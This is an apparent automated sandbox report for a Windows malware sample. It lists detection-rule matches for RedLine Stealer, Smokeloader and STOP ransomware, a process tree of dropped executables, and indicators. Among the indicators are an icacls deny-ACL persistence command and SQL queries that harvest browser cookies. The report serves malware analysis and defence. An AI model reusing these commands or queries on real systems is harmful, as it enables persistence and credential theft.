          Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: String function: 00413FF0 appears 54 times
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401558
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,0_2_00401749
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401564
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401577
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401523
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401585
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040158C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040159A
          Source: 3046.exe.4.drStatic PE information: Section: .data ZLIB complexity 0.9922957294330775
          Source: 3046.exe.15.drStatic PE information: Section: .data ZLIB complexity 0.9922957294330775
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@40/35@15/12
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: file.exeReversingLabs: Detection: 48%
          Source: file.exeVirustotal: Detection: 34%
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4113.exe C:\Users\user\AppData\Local\Temp\4113.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\sievwvt C:\Users\user\AppData\Roaming\sievwvt
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A33B.exe C:\Users\user\AppData\Local\Temp\A33B.exe
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\98D7.exe C:\Users\user\AppData\Local\Temp\98D7.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E4.exe C:\Users\user\AppData\Local\Temp\E4.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFB.exe C:\Users\user\AppData\Local\Temp\ECFB.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D8D3.exe C:\Users\user\AppData\Local\Temp\D8D3.exe
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe"
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe "C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" -h
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4113.exe C:\Users\user\AppData\Local\Temp\4113.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A33B.exe C:\Users\user\AppData\Local\Temp\A33B.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\98D7.exe C:\Users\user\AppData\Local\Temp\98D7.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E4.exe C:\Users\user\AppData\Local\Temp\E4.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFB.exe C:\Users\user\AppData\Local\Temp\ECFB.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D8D3.exe C:\Users\user\AppData\Local\Temp\D8D3.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStartJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStartJump to behavior
          Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAC2C1E-7C5C-40eb-833B-323E85A1CE84}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4113.tmpJump to behavior
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;dLjomud+YRBl+d09/o
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
          Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444688857.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444922096.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.441639812.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.450201207.00000000004BA000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.466985483.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
          Source: llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;)
          Source: 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;+[
          Source: llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;86VK9
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: D8D3.exe, 00000013.00000003.513494216.0000000003EA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092C040 CreateToolhelp32Snapshot,Module32First,0_2_0092C040
          Source: A33B.exe.4.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeMutant created: \Sessions\1\BaseNamedObjects\MilcoSoft_#Rip_X
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess996
